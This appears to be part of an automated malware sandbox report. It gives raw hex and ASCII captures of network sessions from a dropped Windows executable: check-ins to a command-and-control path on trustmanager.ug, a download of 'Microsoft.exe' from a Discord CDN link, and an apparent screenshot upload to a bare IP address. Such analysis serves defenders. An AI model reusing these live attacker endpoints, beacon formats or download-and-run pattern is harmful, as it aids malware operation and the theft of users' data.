6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:08:57.988884926 CEST	12514	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
27	192.168.2.3	49750	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:08:57.896991014 CEST	12427	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:08:57.923019886 CEST	12454	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:08:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:08:57.923039913 CEST	12455	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
28	192.168.2.3	49752	162.159.134.233	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:08:57.955797911 CEST	12506	OUT	GET /attachments/878382243242983437/879113244856430592/Microsoft.exe HTTP/1.1 Host: cdn.discordapp.com
Aug 23, 2021 02:08:57.978713989 CEST	12512	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 23 Aug 2021 00:08:57 GMT Transfer-Encoding: chunked Connection: keep-alive Cache-Control: max-age=3600 Expires: Mon, 23 Aug 2021 01:08:57 GMT Location: https://cdn.discordapp.com/attachments/878382243242983437/879113244856430592/Microsoft.exe X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=48a8UBquVwLcV3yFy4qSOWShOTOHGL4qSt6jWxRQAn1yVfsL7IDXbhaeBPjbjId%2FgQNOjgcdvcx6tVdkanONQeLly2DSl0ACfHC6L%2FIdWrPEU%2FDWPnmTXKFjVBsHi0OwuH9esA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 68301c0249c9d6b9-FRA alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
29	192.168.2.3	49754	185.215.113.206	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:08:58.059199095 CEST	12515	OUT	POST /k8FppT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----40b0eb3d52330030f6bb67b3bee306cb Host: 185.215.113.206 Content-Length: 93529 Cache-Control: no-cache
Aug 23, 2021 02:08:58.066945076 CEST	12515	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 34 30 62 30 65 62 33 64 35 32 33 33 30 30 33 30 66 36 62 62 36 37 62 33 62 65 65 33 30 36 63 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 Data Ascii: ------40b0eb3d52330030f6bb67b3bee306cbContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
Aug 23, 2021 02:08:58.067326069 CEST	12525	OUT	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
Aug 23, 2021 02:08:58.067734003 CEST	12528	OUT	Data Raw: fc b8 7d 9b c9 ce ef 61 bb 38 fc 36 fb d7 05 6e 78 a7 24 df de ff 00 c9 7e 67 55 3e 56 d2 b2 fc 3f cc f9 57 53 55 4d 4a 50 a0 01 90 70 3e 82 aa 55 cd 57 fe 42 53 7e 1f c8 55 3c 57 44 be 26 73 2d 84 a5 a5 a5 34 80 6d 14 b4 b8 a0 06 f6 a5 c5 3b 14 Data Ascii: }a86nx$~gU>V?WSUMJPp>UWBS~U<WD&s-4m;b1KN&(1K)h(bSEv1@;EE%bRPbbPRQv((PF)h4} wLT!Z,;SIVb\mbIv(SIV
Aug 23, 2021 02:08:58.123748064 CEST	12535	OUT	Data Raw: 96 28 a1 96 48 a4 48 e6 52 d1 3b 29 02 40 09 04 a9 ee 32 08 e3 b8 ac 29 50 a7 4a 72 94 34 6f 7f c4 b9 d4 9c e2 94 ba 11 d1 56 ae 34 db fb 48 9e 5b 9b 1b 98 63 49 8c 0e f2 42 ca 16 40 32 50 92 38 6c 73 8e b4 eb 6d 23 53 bc fb 3f d9 74 db c9 fe d2 Data Ascii: (HHR;)@2)PJr4oV4H[cIB@2P8lsm#S?tyP3, rq"KVn4BP}UEKtH=o*[67Vs#b`84]VZ$IN^4}BVd{D__k]Mq!{Ic-AuV2yo$d
Aug 23, 2021 02:08:58.123806953 CEST	12538	OUT	Data Raw: 78 46 54 8b c4 90 b1 96 28 66 30 ce b6 d2 ca c1 55 27 31 30 88 e4 f0 0e fd b8 27 a1 c1 ac 3a 08 04 60 d6 b2 57 8b 5d cc d3 b3 b9 e8 5e 1f d1 4e 91 3e 91 36 a7 69 ac 5a 5e ca 35 21 73 67 79 2e c3 22 8b 42 4c b1 ab 46 0a ee ce dc 9d dc af 7e 95 04 Data Ascii: xFT(f0U'10':`W]^N>6iZ^5!sgy."BLF~<!kro2`OJw+ImZz<IxZG=vuP#Up=<tbUg$b;lo%3Q9]1{UXio
Aug 23, 2021 02:08:58.123827934 CEST	12541	OUT	Data Raw: c6 62 8a 7d 18 a2 c1 71 84 53 76 d4 98 a4 22 90 5c 8c 8a 42 2a 4c 53 71 4a c5 26 47 8a 4c 54 b8 a6 e2 a6 c5 5c 8f 14 62 a4 c5 37 14 ac 3b 8c c5 18 a7 d2 11 49 a1 dc 66 28 c5 2e 28 c5 2b 0e e3 48 a4 c5 3b 14 62 8b 00 cc 52 11 4f a4 c5 49 57 19 8a Data Ascii: b}qSv"\B*LSqJ&GLT\b7;If(.(+H;bROIW1OqAXbv))Rb7bE'zLRJ1@b(m8CK@"-BTF[#9Ss9B.Odg+jz}???XrWSG#V
Aug 23, 2021 02:08:58.124113083 CEST	12544	OUT	Data Raw: bd a4 52 b6 b5 3b a0 59 59 17 cb 48 81 04 8c e7 39 3c e7 8f 4f 4a f3 f1 7f c4 5e 86 4f 97 da 7b db 58 a3 e2 d4 d2 a0 f1 04 f6 ba 35 bf 95 6b 6d fb 92 de 63 31 91 c7 de 6e 49 ef c7 1c 71 5e 9b a8 bd 88 d5 2e c3 db dc 16 f3 9f 24 4e a0 13 b8 f6 d9 Data Ascii: R;YYH9<OJ^O{X5kmc1nIq^.$N^e/T48XP6~0y{?n?rykn>e]EFv"u;m:_65O/Okoddo?Z;%.vvWF[Hz("
Aug 23, 2021 02:08:58.124305964 CEST	12546	OUT	Data Raw: 6e 73 8c ef c6 58 1e bc e2 bc e2 0d 5f 55 b5 6b 43 6d 7c f0 9b 48 24 b7 80 c6 00 29 1c 9b 8b 8c e3 9c ef 6e 4f 23 3c 74 14 c5 d4 b5 24 b0 5b 15 bb c5 a8 b5 6b 41 1f 96 bf ea 9a 4f 34 ae 71 9f bf ce 7a f6 e9 c5 29 52 a9 b2 da ef f5 5f e5 f8 8d 54 Data Ascii: nsX_UkCm\|H$)nO#<t$[kAO4qz)R_T{/Yi[2jCcxg=[:vqFoH3k[2[WN3{f][VioK.f*U9cb97w7:>w1y<%)-?~mWd+5j
Aug 23, 2021 02:08:58.124584913 CEST	12552	OUT	Data Raw: 8a 5b 18 76 34 dd a7 d2 af f9 8a 7a 8a 5f dd 9f e1 a3 d9 f9 87 b4 7d 8c fe 73 4a 33 8a d0 f2 a2 34 1b 68 8f 7a 5e c9 87 b5 46 7d 2d 5c fb 18 ec d4 9f 63 6e c6 8f 65 21 fb 48 95 28 ab 06 d2 41 da 9a 6d e4 1d 8d 2e 46 35 38 f7 21 c5 18 a9 0c 6c 3f Data Ascii: [v4z_}sJ34hz^F}-\cne!H(Am.F58!l?vqb1E%/zP(.%-.(a\mQ`b1JQLBQE.K@)RsKZbRi:qER7)qE:bJ*+.)NQ~(bH9F3Rm>QsZiON
Aug 23, 2021 02:08:58.124845028 CEST	12556	OUT	Data Raw: d8 aa b9 a3 34 bd 9c 46 58 37 72 f7 6c fd 4d 1f 6b 97 1f 7b 1f 41 55 b3 4b 4f 92 3d 83 62 c1 b9 95 87 32 31 fc 69 a6 46 6e ac 4f d6 a3 a2 8e 48 f6 0b b2 55 72 0e 6b a5 bd bc 78 be 1a b7 cd cb cf b7 f0 ae 5f a0 ad 5d 62 5c 7c 3e 86 3f 5b 93 5c 38 Data Ascii: 4FX7rlMk{AUKO=b21iFnOHUrkx_]b\\|>?[\8'w`%iK)bCM:zj<vS@P7,IV~\2y>oH4k+}Xo`9*>i":L\W:DC IF#NmmdLgl[Z=)C
Aug 23, 2021 02:08:59.158754110 CEST	15400	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 23 Aug 2021 00:08:59 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49711	222.236.49.124	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:07:59.091788054 CEST	1569	OUT	POST /upload/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://atvcampingtrips.com/upload/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 212 Host: atvcampingtrips.com
Aug 23, 2021 02:07:59.091799021 CEST	1569	OUT	Data Raw: 39 6e 51 18 83 cb 1e 26 db af c9 71 00 01 7f bc 7d 7e ca 94 63 73 e5 16 0f 7e 78 e2 32 c5 ce 6e ef 29 b4 20 76 65 2b 1a ef 97 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 57 3d c2 b9 Data Ascii: 9nQ&q}~cs~x2n) ve+?$`7C[zqNA -[k,vuW=E[Aox6.`%zT{Ckjl$QT<] SJF#`q{FP`+SwxxM5%>A
Aug 23, 2021 02:08:00.299171925 CEST	1576	IN	HTTP/1.0 404 Not Found Date: Mon, 23 Aug 2021 00:07:59 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 334 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 70 6c 6f 61 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /upload/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
30	192.168.2.3	49755	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:08:58.070488930 CEST	12528	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:08:58.096401930 CEST	12532	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:08:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 